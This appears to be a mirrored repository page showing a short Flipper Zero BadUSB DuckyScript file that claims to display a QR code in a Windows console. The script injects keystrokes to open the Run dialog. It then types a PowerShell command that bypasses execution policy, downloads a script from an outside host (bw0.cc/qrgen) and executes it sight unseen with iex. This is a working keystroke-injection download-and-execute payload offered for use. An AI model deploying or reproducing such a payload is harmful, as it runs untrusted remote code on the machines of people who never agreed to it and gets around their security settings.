mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-24 12:03:52 -08:00
17 lines
411 B
Plaintext
17 lines
411 B
Plaintext
|
|
REM Title: beigeworm's QR code to console.
|
|
REM Author: @beigeworm
|
|
REM Description: Uses Powershell to display a generated QR code from text or a URL
|
|
REM Target: Windows 10 and 11
|
|
|
|
REM SETUP
|
|
REM Replace https://beigeworm.com with your url ot text string.
|
|
|
|
DEFAULT_DELAY 100
|
|
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 750
|
|
STRING powershell -Ep Bypass -C $txt = 'https://beigeworm.com'; irm bw0.cc/qrgen | iex
|
|
ENTER
|